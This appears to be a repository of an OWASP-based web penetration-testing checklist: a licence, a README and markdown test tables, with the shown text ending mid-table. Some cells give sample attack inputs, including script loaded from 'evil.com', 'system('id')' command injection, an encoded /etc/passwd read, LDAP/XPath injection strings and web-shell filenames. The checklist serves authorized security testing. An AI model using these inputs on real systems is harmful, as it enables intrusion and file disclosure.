├── COPYING ├── README.md ├── checklist ├── authentication.md ├── authorization.md ├── business_logic.md ├── client_side.md ├── configuration_management.md ├── cryptography.md ├── data_validation.md ├── error_handling.md ├── identity_management.md ├── information_gathering.md └── session_management.md ├── report_template.md └── variables.yml /COPYING: -------------------------------------------------------------------------------- 1 | Creative Commons Attribution 4.0 International 2 | ============================================== 3 | 4 | Creative Commons Corporation ("Creative Commons") is not a law firm and 5 | does not provide legal services or legal advice. Distribution of 6 | Creative Commons public licenses does not create a lawyer-client or 7 | other relationship. Creative Commons makes its licenses and related 8 | information available on an "as-is" basis. Creative Commons gives no 9 | warranties regarding its licenses, any material licensed under their 10 | terms and conditions, or any related information. Creative Commons 11 | disclaims all liability for damages resulting from their use to the 12 | fullest extent possible. 13 | 14 | Using Creative Commons Public Licenses 15 | 16 | Creative Commons public licenses provide a standard set of terms and 17 | conditions that creators and other rights holders may use to share 18 | original works of authorship and other material subject to copyright 19 | and certain other rights specified in the public license below. The 20 | following considerations are for informational purposes only, are not 21 | exhaustive, and do not form part of our licenses. 22 | 23 | Considerations for licensors: Our public licenses are 24 | intended for use by those authorized to give the public 25 | permission to use material in ways otherwise restricted by 26 | copyright and certain other rights. Our licenses are 27 | irrevocable. Licensors should read and understand the terms 28 | and conditions of the license they choose before applying it. 29 | Licensors should also secure all rights necessary before 30 | applying our licenses so that the public can reuse the 31 | material as expected. Licensors should clearly mark any 32 | material not subject to the license. This includes other CC- 33 | licensed material, or material used under an exception or 34 | limitation to copyright. More considerations for licensors: 35 | wiki.creativecommons.org/Considerations_for_licensors 36 | 37 | Considerations for the public: By using one of our public 38 | licenses, a licensor grants the public permission to use the 39 | licensed material under specified terms and conditions. If 40 | the licensor's permission is not necessary for any reason--for 41 | example, because of any applicable exception or limitation to 42 | copyright--then that use is not regulated by the license. Our 43 | licenses grant only permissions under copyright and certain 44 | other rights that a licensor has authority to grant. Use of 45 | the licensed material may still be restricted for other 46 | reasons, including because others have copyright or other 47 | rights in the material. A licensor may make special requests, 48 | such as asking that all changes be marked or described. 49 | Although not required by our licenses, you are encouraged to 50 | respect those requests where reasonable. More_considerations 51 | for the public: 52 | wiki.creativecommons.org/Considerations_for_licensees 53 | 54 | ======================================================================= 55 | 56 | Creative Commons Attribution 4.0 International Public License 57 | 58 | By exercising the Licensed Rights (defined below), You accept and agree 59 | to be bound by the terms and conditions of this Creative Commons 60 | Attribution 4.0 International Public License ("Public License"). To the 61 | extent this Public License may be interpreted as a contract, You are 62 | granted the Licensed Rights in consideration of Your acceptance of 63 | these terms and conditions, and the Licensor grants You such rights in 64 | consideration of benefits the Licensor receives from making the 65 | Licensed Material available under these terms and conditions. 66 | 67 | 68 | Section 1 -- Definitions. 69 | 70 | a. Adapted Material means material subject to Copyright and Similar 71 | Rights that is derived from or based upon the Licensed Material 72 | and in which the Licensed Material is translated, altered, 73 | arranged, transformed, or otherwise modified in a manner requiring 74 | permission under the Copyright and Similar Rights held by the 75 | Licensor. For purposes of this Public License, where the Licensed 76 | Material is a musical work, performance, or sound recording, 77 | Adapted Material is always produced where the Licensed Material is 78 | synched in timed relation with a moving image. 79 | 80 | b. Adapter's License means the license You apply to Your Copyright 81 | and Similar Rights in Your contributions to Adapted Material in 82 | accordance with the terms and conditions of this Public License. 83 | 84 | c. Copyright and Similar Rights means copyright and/or similar rights 85 | closely related to copyright including, without limitation, 86 | performance, broadcast, sound recording, and Sui Generis Database 87 | Rights, without regard to how the rights are labeled or 88 | categorized. For purposes of this Public License, the rights 89 | specified in Section 2(b)(1)-(2) are not Copyright and Similar 90 | Rights. 91 | 92 | d. Effective Technological Measures means those measures that, in the 93 | absence of proper authority, may not be circumvented under laws 94 | fulfilling obligations under Article 11 of the WIPO Copyright 95 | Treaty adopted on December 20, 1996, and/or similar international 96 | agreements. 97 | 98 | e. Exceptions and Limitations means fair use, fair dealing, and/or 99 | any other exception or limitation to Copyright and Similar Rights 100 | that applies to Your use of the Licensed Material. 101 | 102 | f. Licensed Material means the artistic or literary work, database, 103 | or other material to which the Licensor applied this Public 104 | License. 105 | 106 | g. Licensed Rights means the rights granted to You subject to the 107 | terms and conditions of this Public License, which are limited to 108 | all Copyright and Similar Rights that apply to Your use of the 109 | Licensed Material and that the Licensor has authority to license. 110 | 111 | h. Licensor means the individual(s) or entity(ies) granting rights 112 | under this Public License. 113 | 114 | i. Share means to provide material to the public by any means or 115 | process that requires permission under the Licensed Rights, such 116 | as reproduction, public display, public performance, distribution, 117 | dissemination, communication, or importation, and to make material 118 | available to the public including in ways that members of the 119 | public may access the material from a place and at a time 120 | individually chosen by them. 121 | 122 | j. Sui Generis Database Rights means rights other than copyright 123 | resulting from Directive 96/9/EC of the European Parliament and of 124 | the Council of 11 March 1996 on the legal protection of databases, 125 | as amended and/or succeeded, as well as other essentially 126 | equivalent rights anywhere in the world. 127 | 128 | k. You means the individual or entity exercising the Licensed Rights 129 | under this Public License. Your has a corresponding meaning. 130 | 131 | 132 | Section 2 -- Scope. 133 | 134 | a. License grant. 135 | 136 | 1. Subject to the terms and conditions of this Public License, 137 | the Licensor hereby grants You a worldwide, royalty-free, 138 | non-sublicensable, non-exclusive, irrevocable license to 139 | exercise the Licensed Rights in the Licensed Material to: 140 | 141 | a. reproduce and Share the Licensed Material, in whole or 142 | in part; and 143 | 144 | b. produce, reproduce, and Share Adapted Material. 145 | 146 | 2. Exceptions and Limitations. For the avoidance of doubt, where 147 | Exceptions and Limitations apply to Your use, this Public 148 | License does not apply, and You do not need to comply with 149 | its terms and conditions. 150 | 151 | 3. Term. The term of this Public License is specified in Section 152 | 6(a). 153 | 154 | 4. Media and formats; technical modifications allowed. The 155 | Licensor authorizes You to exercise the Licensed Rights in 156 | all media and formats whether now known or hereafter created, 157 | and to make technical modifications necessary to do so. The 158 | Licensor waives and/or agrees not to assert any right or 159 | authority to forbid You from making technical modifications 160 | necessary to exercise the Licensed Rights, including 161 | technical modifications necessary to circumvent Effective 162 | Technological Measures. For purposes of this Public License, 163 | simply making modifications authorized by this Section 2(a) 164 | (4) never produces Adapted Material. 165 | 166 | 5. Downstream recipients. 167 | 168 | a. Offer from the Licensor -- Licensed Material. Every 169 | recipient of the Licensed Material automatically 170 | receives an offer from the Licensor to exercise the 171 | Licensed Rights under the terms and conditions of this 172 | Public License. 173 | 174 | b. No downstream restrictions. You may not offer or impose 175 | any additional or different terms or conditions on, or 176 | apply any Effective Technological Measures to, the 177 | Licensed Material if doing so restricts exercise of the 178 | Licensed Rights by any recipient of the Licensed 179 | Material. 180 | 181 | 6. No endorsement. Nothing in this Public License constitutes or 182 | may be construed as permission to assert or imply that You 183 | are, or that Your use of the Licensed Material is, connected 184 | with, or sponsored, endorsed, or granted official status by, 185 | the Licensor or others designated to receive attribution as 186 | provided in Section 3(a)(1)(A)(i). 187 | 188 | b. Other rights. 189 | 190 | 1. Moral rights, such as the right of integrity, are not 191 | licensed under this Public License, nor are publicity, 192 | privacy, and/or other similar personality rights; however, to 193 | the extent possible, the Licensor waives and/or agrees not to 194 | assert any such rights held by the Licensor to the limited 195 | extent necessary to allow You to exercise the Licensed 196 | Rights, but not otherwise. 197 | 198 | 2. Patent and trademark rights are not licensed under this 199 | Public License. 200 | 201 | 3. To the extent possible, the Licensor waives any right to 202 | collect royalties from You for the exercise of the Licensed 203 | Rights, whether directly or through a collecting society 204 | under any voluntary or waivable statutory or compulsory 205 | licensing scheme. In all other cases the Licensor expressly 206 | reserves any right to collect such royalties. 207 | 208 | 209 | Section 3 -- License Conditions. 210 | 211 | Your exercise of the Licensed Rights is expressly made subject to the 212 | following conditions. 213 | 214 | a. Attribution. 215 | 216 | 1. If You Share the Licensed Material (including in modified 217 | form), You must: 218 | 219 | a. retain the following if it is supplied by the Licensor 220 | with the Licensed Material: 221 | 222 | i. identification of the creator(s) of the Licensed 223 | Material and any others designated to receive 224 | attribution, in any reasonable manner requested by 225 | the Licensor (including by pseudonym if 226 | designated); 227 | 228 | ii. a copyright notice; 229 | 230 | iii. a notice that refers to this Public License; 231 | 232 | iv. a notice that refers to the disclaimer of 233 | warranties; 234 | 235 | v. a URI or hyperlink to the Licensed Material to the 236 | extent reasonably practicable; 237 | 238 | b. indicate if You modified the Licensed Material and 239 | retain an indication of any previous modifications; and 240 | 241 | c. indicate the Licensed Material is licensed under this 242 | Public License, and include the text of, or the URI or 243 | hyperlink to, this Public License. 244 | 245 | 2. You may satisfy the conditions in Section 3(a)(1) in any 246 | reasonable manner based on the medium, means, and context in 247 | which You Share the Licensed Material. For example, it may be 248 | reasonable to satisfy the conditions by providing a URI or 249 | hyperlink to a resource that includes the required 250 | information. 251 | 252 | 3. If requested by the Licensor, You must remove any of the 253 | information required by Section 3(a)(1)(A) to the extent 254 | reasonably practicable. 255 | 256 | 4. If You Share Adapted Material You produce, the Adapter's 257 | License You apply must not prevent recipients of the Adapted 258 | Material from complying with this Public License. 259 | 260 | 261 | Section 4 -- Sui Generis Database Rights. 262 | 263 | Where the Licensed Rights include Sui Generis Database Rights that 264 | apply to Your use of the Licensed Material: 265 | 266 | a. for the avoidance of doubt, Section 2(a)(1) grants You the right 267 | to extract, reuse, reproduce, and Share all or a substantial 268 | portion of the contents of the database; 269 | 270 | b. if You include all or a substantial portion of the database 271 | contents in a database in which You have Sui Generis Database 272 | Rights, then the database in which You have Sui Generis Database 273 | Rights (but not its individual contents) is Adapted Material; and 274 | 275 | c. You must comply with the conditions in Section 3(a) if You Share 276 | all or a substantial portion of the contents of the database. 277 | 278 | For the avoidance of doubt, this Section 4 supplements and does not 279 | replace Your obligations under this Public License where the Licensed 280 | Rights include other Copyright and Similar Rights. 281 | 282 | 283 | Section 5 -- Disclaimer of Warranties and Limitation of Liability. 284 | 285 | a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE 286 | EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS 287 | AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF 288 | ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS, 289 | IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION, 290 | WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR 291 | PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS, 292 | ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT 293 | KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT 294 | ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU. 295 | 296 | b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE 297 | TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION, 298 | NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT, 299 | INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES, 300 | COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR 301 | USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN 302 | ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR 303 | DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR 304 | IN PART, THIS LIMITATION MAY NOT APPLY TO YOU. 305 | 306 | c. The disclaimer of warranties and limitation of liability provided 307 | above shall be interpreted in a manner that, to the extent 308 | possible, most closely approximates an absolute disclaimer and 309 | waiver of all liability. 310 | 311 | 312 | Section 6 -- Term and Termination. 313 | 314 | a. This Public License applies for the term of the Copyright and 315 | Similar Rights licensed here. However, if You fail to comply with 316 | this Public License, then Your rights under this Public License 317 | terminate automatically. 318 | 319 | b. Where Your right to use the Licensed Material has terminated under 320 | Section 6(a), it reinstates: 321 | 322 | 1. automatically as of the date the violation is cured, provided 323 | it is cured within 30 days of Your discovery of the 324 | violation; or 325 | 326 | 2. upon express reinstatement by the Licensor. 327 | 328 | For the avoidance of doubt, this Section 6(b) does not affect any 329 | right the Licensor may have to seek remedies for Your violations 330 | of this Public License. 331 | 332 | c. For the avoidance of doubt, the Licensor may also offer the 333 | Licensed Material under separate terms or conditions or stop 334 | distributing the Licensed Material at any time; however, doing so 335 | will not terminate this Public License. 336 | 337 | d. Sections 1, 5, 6, 7, and 8 survive termination of this Public 338 | License. 339 | 340 | 341 | Section 7 -- Other Terms and Conditions. 342 | 343 | a. The Licensor shall not be bound by any additional or different 344 | terms or conditions communicated by You unless expressly agreed. 345 | 346 | b. Any arrangements, understandings, or agreements regarding the 347 | Licensed Material not stated herein are separate from and 348 | independent of the terms and conditions of this Public License. 349 | 350 | 351 | Section 8 -- Interpretation. 352 | 353 | a. For the avoidance of doubt, this Public License does not, and 354 | shall not be interpreted to, reduce, limit, restrict, or impose 355 | conditions on any use of the Licensed Material that could lawfully 356 | be made without permission under this Public License. 357 | 358 | b. To the extent possible, if any provision of this Public License is 359 | deemed unenforceable, it shall be automatically reformed to the 360 | minimum extent necessary to make it enforceable. If the provision 361 | cannot be reformed, it shall be severed from this Public License 362 | without affecting the enforceability of the remaining terms and 363 | conditions. 364 | 365 | c. No term or condition of this Public License will be waived and no 366 | failure to comply consented to unless expressly agreed to by the 367 | Licensor. 368 | 369 | d. Nothing in this Public License constitutes or may be interpreted 370 | as a limitation upon, or waiver of, any privileges and immunities 371 | that apply to the Licensor or You, including from the legal 372 | processes of any jurisdiction or authority. 373 | 374 | 375 | ======================================================================= 376 | 377 | Creative Commons is not a party to its public 378 | licenses. Notwithstanding, Creative Commons may elect to apply one of 379 | its public licenses to material it publishes and in those instances 380 | will be considered the “Licensor.” The text of the Creative Commons 381 | public licenses is dedicated to the public domain under the CC0 Public 382 | Domain Dedication. Except for the limited purpose of indicating that 383 | material is shared under a Creative Commons public license or as 384 | otherwise permitted by the Creative Commons policies published at 385 | creativecommons.org/policies, Creative Commons does not authorize the 386 | use of the trademark "Creative Commons" or any other trademark or logo 387 | of Creative Commons without its prior written consent including, 388 | without limitation, in connection with any unauthorized modifications 389 | to any of its public licenses or any other arrangements, 390 | understandings, or agreements concerning use of licensed material. For 391 | the avoidance of doubt, this paragraph does not form part of the 392 | public licenses. 393 | 394 | Creative Commons may be contacted at . 395 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Penetration Testing Checklist 2 | 3 | _OWASP-based Web Application Security Testing Checklist._ 4 | 5 | [![Creative Commons Attribution 4.0 International](https://img.shields.io/badge/license-CC--BY--4.0-blue?style=flat-square)](https://spdx.org/licenses/CC-BY-4.0.html) 6 | 7 | ## Motivation 8 | 9 | Using a text-based format such as markdown for this checklist allows for easier manipulation via common UNIX command line tools such as `awk`, `grep`, and `sed`. 10 | 11 | ## GitHub Issues Templates 12 | 13 | Copy markdown file(s) to the `.github/ISSUE_TEMPLATE/` directory, prepend the following YAML snippet to the front matter, and customize for each template: 14 | 15 | ```yaml 16 | about: ~ 17 | assignees: ~ 18 | labels: ~ 19 | name: ~ 20 | title: ~ 21 | ``` 22 | 23 | ## Report Generation 24 | 25 | ```sh 26 | pandoc report.md -o report.pdf 27 | ``` 28 | 29 | ## Acknowledgement 30 | 31 | Based on [Prathan Phongthiproek's OWASP Testing Checklist](https://github.com/tanprathan/OWASP-Testing-Checklist). 32 | 33 | Converted to Markdown via [Kyokomi's excel-to-markdown](https://github.com/kyokomi/excel-to-markdown). 34 | 35 | ## License 36 | 37 | This work is licensed under a [Creative Commons Attribution 4.0 International License](COPYING). 38 | 39 | ## Reference 40 | 41 | - [GitHub Help: Configuring issue templates for your repository](https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository) 42 | 43 | - [Pandoc User's Guide: Creating a PDF](https://pandoc.org/MANUAL.html#creating-a-pdf) 44 | 45 | ## See Also 46 | 47 | - [Penetration Testing Guide](https://github.com/oxr463/pentesting-guide) 48 | 49 | - [Penetration Testing Virtual Machine](https://github.com/oxr463/pentesting-vm) 50 | -------------------------------------------------------------------------------- /checklist/authentication.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Authentication Testing|Test Name|Description|Tools|Status|Comment| 5 | |----------------------|---------|-----------|-----|------|-------| 6 | |OTG-AUTHN-001|Credentials Transported over Unencrypted Channel|Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.|{{proxy}}|Not Started|| 7 | |OTG-AUTHN-002|Default Credentials|Testing for default credentials of common applications, Testing for default password of new accounts.|{{proxy}}|Not Started|| 8 | |OTG-AUTHN-003|Weak Lock-out Mechanism|Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing, Evaluate the unlock mechanism’s resistance to unauthorized account unlocking|{{browser}}|Not Started|| 9 | |OTG-AUTHN-004|Authentication Schema Bypass|Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection|{{proxy}}|Not Started|| 10 | |OTG-AUTHN-005|Remember Password Functionality|Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?|{{proxy}}|Not Started|| 11 | |OTG-AUTHN-006|Browser Cache Weakness|Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)|{{proxy}}|Not Started|| 12 | |OTG-AUTHN-007|Weak Password Policy|Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords.|{{proxy}}|Not Started|| 13 | |OTG-AUTHN-008|Weak Security Question/Answer|Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)|{{browser}}|Not Started|| 14 | |OTG-AUTHN-009|Weak Password Change/Reset Functionality|Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?|{{browser}}, {{proxy}}|Not Started|| 15 | |OTG-AUTHN-010|Weaker Authentication in Alternative Channel|Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)|{{browser}}|Not Started|| 16 | -------------------------------------------------------------------------------- /checklist/authorization.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Authorization Testing |Test Name|Description|Tools|Status|Comment| 5 | |----------------------|---------|-----------|-----|------|-------| 6 | |OTG-AUTHZ-001|Directory Traversal/File Include|dot-dot-slash attack (`../`), Directory traversal, Local File inclusion/Remote File Inclusion.|{{proxy}}|Not Started|| 7 | |OTG-AUTHZ-002|Authorization Schema Bypass|Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)|{{proxy}}|Not Started|| 8 | |OTG-AUTHZ-003|Privilege Escalation|Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1|{{proxy}}|Not Started|| 9 | |OTG-AUTHZ-004|Insecure Direct-Object Reference|Force changing parameter value (?invoice=123 -> ?invoice=456)|{{proxy}}|Not Started|| 10 | -------------------------------------------------------------------------------- /checklist/business_logic.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Business Logic Testing|Test Name|Description|Tools|Status|Comment| 5 | |----------------------|---------|-----------|-----|------|-------| 6 | |OTG-BUSLOGIC-001|Business Logic Data Validation|Looking for data entry points or hand off points between systems or software, Once found try to insert logically invalid data into the application/system.|{{proxy}}|Not Started|| 7 | |OTG-BUSLOGIC-002|Ability to Forge Requests|Looking for guessable, predictable or hidden functionality of fields, Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow.|{{proxy}}|Not Started|| 8 | |OTG-BUSLOGIC-003|Integrity Checks|Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information, For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component, Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that should not be allowed per the busines logic workflow.|{{proxy}}|Not Started|| 9 | |OTG-BUSLOGIC-004|Process Timing|Looking for application/system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time, Develop and execute the mis-use cases ensuring that attackers can not gain an advantage based on any timing.|{{proxy}}|Not Started|| 10 | |OTG-BUSLOGIC-005|Number of Times a Function Can be Used Limits|Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow, For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.|{{proxy}}|Not Started|| 11 | |OTG-BUSLOGIC-006|Circumvention of Work Flows|Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow, For each method develop a misuse case and try to circumvent or perform an action that is "not acceptable" per the the business logic workflow.|{{proxy}}|Not Started|| 12 | |OTG-BUSLOGIC-007|Defenses Against Application Mis-use|Measures that might indicate the application has in-built self-defense: Changed responses, Blocked requests, Actions that log a user out or lock their account|{{proxy}}|Not Started|| 13 | |OTG-BUSLOGIC-008|Upload of Unexpected File Types|Review the project documentation and perform some exploratory testing looking for file types that should be "unsupported" by the application/system, Try to upload these “unsupported” files an verify that it are properly rejected, If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated, PS. file.phtml, shell.phPWND, SHELL~1.PHP|{{proxy}}|Not Started|| 14 | |OTG-BUSLOGIC-009|Upload of Malicious Files|Develop or acquire a known “malicious” file, Try to upload the malicious file to the application/system and verify that it is correctly rejected, If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.|{{proxy}}|Not Started|| 15 | -------------------------------------------------------------------------------- /checklist/client_side.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Client-Side Testing|Test Name|Description|Tools|Status|Comment| 5 | |-------------------|---------|-----------|-----|------|-------| 6 | |OTG-CLIENT-001|DOM-based Cross-Site Scripting|Test for the user inputs obtained from client-side JavaScript Objects|{{proxy}}|Not Started|| 7 | |OTG-CLIENT-002|JavaScript Execution|Inject JavaScript code: `www.victim.com/?javascript:alert(1)`|{{proxy}}|Not Started|| 8 | |OTG-CLIENT-003|HTML Injection|Send malicious HTML code: `?user=`|{{proxy}}|Not Started|| 9 | |OTG-CLIENT-004|Client-Side URL Redirect|Modify untrusted URL input to a malicious site: (Open Redirect) `?redirect=www.fake-target.site`|{{proxy}}|Not Started|| 10 | |OTG-CLIENT-005|CSS Injection|Inject code in the CSS context: `www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])`, `www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)`|{{proxy}}|Not Started|| 11 | |OTG-CLIENT-006|Client-Side Resource Manipulation|External JavaScript could be easily injected in the trusted web site `www.victim.com/#http://evil.com/js.js`|{{proxy}}|Not Started|| 12 | |OTG-CLIENT-007|Cross-Origin Resource Sharing|Check the HTTP headers in order to understand how CORS is used (Origin Header)|{{proxy}}|Not Started|| 13 | |OTG-CLIENT-008|Cross-Site Flashing|Decompile, Undefined variables, Unsafe methods, Include malicious SWF (`http://victim/file.swf?lang=http://evil`)|{{custom}}|Not Started|| 14 | |OTG-CLIENT-009|Clickjacking|Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.|{{proxy}}|Not Started|| 15 | |OTG-CLIENT-010|WebSockets|Identify that the application is using WebSockets by inspecting `ws://` or `wss://` URI scheme. Use Developer Tools in the browser to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization|{{proxy}}|Not Started|| 16 | |OTG-CLIENT-011|Web Messaging|Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains|{{proxy}}|Not Started|| 17 | |OTG-CLIENT-012|Local Storage|Determine whether the website is storing sensitive data in the storage. XSS in localstorage `http://server/StoragePOC.html#`|{{browser}}, {{proxy}}|Not Started|| 18 | -------------------------------------------------------------------------------- /checklist/configuration_management.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Configuration and Deployment Management Testing|Test Name|Description|Tools|Status|Comment| 5 | |-----------------------------------------------|---------|-----------|-----|------|-------| 6 | |OTG-CONFIG-001|Network/Infrastructure Configuration|Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.|{{scanner}}|Not Started|| 7 | |OTG-CONFIG-002|Application Platform Configuration|Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.|{{browser}}|Not Started|| 8 | |OTG-CONFIG-003|File Extensions Handling for Sensitive Information|Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)|{{browser}}|Not Started|| 9 | |OTG-CONFIG-004|Backup and Unreferenced Files for Sensitive Information|Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename|{{scanner}}|Not Started|| 10 | |OTG-CONFIG-005|Enumerate Infrastructure and Application Admin Interfaces|Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)|{{proxy}}|Not Started|| 11 | |OTG-CONFIG-006|HTTP Methods|Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST|{{proxy}}|Not Started|| 12 | |OTG-CONFIG-007|HTTP Strict-Transport-Security|Identify HSTS header on Web server through HTTP response header. `curl -s -D- https://domain.com \| grep Strict`|{{proxy}}|Not Started|| 13 | |OTG-CONFIG-008|RIA Cross-Domain Policy|Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from|{{proxy}}|Not Started|| 14 | -------------------------------------------------------------------------------- /checklist/cryptography.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Cryptography|Test Name|Description|Tools|Status|Comment| 5 | |------------|---------|-----------|-----|------|-------| 6 | |OTG-CRYPST-001|Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection|Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)|{{custom}}|Not Started|| 7 | |OTG-CRYPST-002|Padding Oracle|Compare the responses in three different states: Cipher text gets decrypted, resulting data is correct, Cipher text gets decrypted, resulting data is garbled and causes some exception or error handling in the application logic, Cipher text decryption fails due to padding errors.|{{custom}}|Not Started|| 8 | |OTG-CRYPST-003|Sensitive Information Sent via Unencrypted Channels|Check sensitive data during the transmission: Information used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…), Information protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customers data)|{{proxy}}|Not Started|| 9 | -------------------------------------------------------------------------------- /checklist/data_validation.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Data Validation Testing|Test Name|Description|Tools|Status|Comment| 5 | |-----------------------|---------|-----------|-----|------|-------| 6 | |OTG-INPVAL-001|Reflected Cross-Site Scripting|Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.|{{proxy}}|Not Started|| 7 | |OTG-INPVAL-002|Stored Cross-Site Scripting|Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF|{{proxy}}|Not Started|| 8 | |OTG-INPVAL-003|HTTP Verb Tampering|Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.|{{proxy}}|Not Started|| 9 | |OTG-INPVAL-004|HTTP Parameter Pollution|Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP|{{proxy}}|Not Started|| 10 | |OTG-INPVAL-005|SQL Injection|Union, Boolean, Error based, Out-of-band, Time delay.|{{custom}}|Not Started|| 11 | ||Oracle||{{custom}}|Not Started|| 12 | ||MySQL||{{custom}}|Not Started|| 13 | ||Microsoft SQL||{{custom}}|Not Started|| 14 | ||PostgreSQL||{{custom}}|Not Started|| 15 | ||Microsoft Access||{{custom}}|Not Started|| 16 | ||NoSQL Injection||{{custom}}|Not Started|| 17 | |OTG-INPVAL-006|LDAP Injection|`/ldapsearch?user=*`, `user=*user=*)(uid=*))(\|(uid=*`, `pass=password`|{{proxy}}|Not Started|| 18 | |OTG-INPVAL-007|ORM Injection|Testing ORM injection is identical to SQL injection testing|{{custom}}|Not Started|| 19 | |OTG-INPVAL-008|XML Injection|Check with XML Meta Characters `', " , <>, , &, , XXE, TAG`|{{proxy}}|Not Started|| 20 | |OTG-INPVAL-009|SSI Injection|Presence of .shtml extension, Check for these characters: `< ! # = / . " - >` and `[a-zA-Z0-9]`, include String = ``|{{proxy}}|Not Started|| 21 | |OTG-INPVAL-010|XPath Injection|Check for XML error enumeration by supplying a single quote (`'`), Username: `‘ or ‘1’ = ‘1`, Password: `‘ or ‘1’ = ‘1`|{{proxy}}|Not Started|| 22 | |OTG-INPVAL-011|IMAP/SMTP Injection|Identifying vulnerable parameters with special characters (i.e.: `\`, `‘`, `“`, `@`, `#`, `!`, `\|`), Understanding the data flow and deployment structure of the client, IMAP/SMTP command injection (Header, Body, Footer)|{{proxy}}|Not Started|| 23 | |OTG-INPVAL-012|Code Injection|Enter OS commands in the input field: `?arg=1; system('id')`|{{proxy}}|Not Started|| 24 | ||Local File Inclusion||{{manual}}|Not Started|| 25 | ||Remote File Inclusion||{{manual}}|Not Started|| 26 | |OTG-INPVAL-013|Command Injection|Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server, `%3Bcat%20/etc/passwd`, `test.pdf+\|+Dir C:\`|{{proxy}}|Not Started|| 27 | |OTG-INPVAL-014|Buffer Overflow|Testing for heap overflow vulnerability, Testing for stack overflow vulnerability, Testing for format string vulnerability|{{scanner}}|Not Started|| 28 | ||Heap 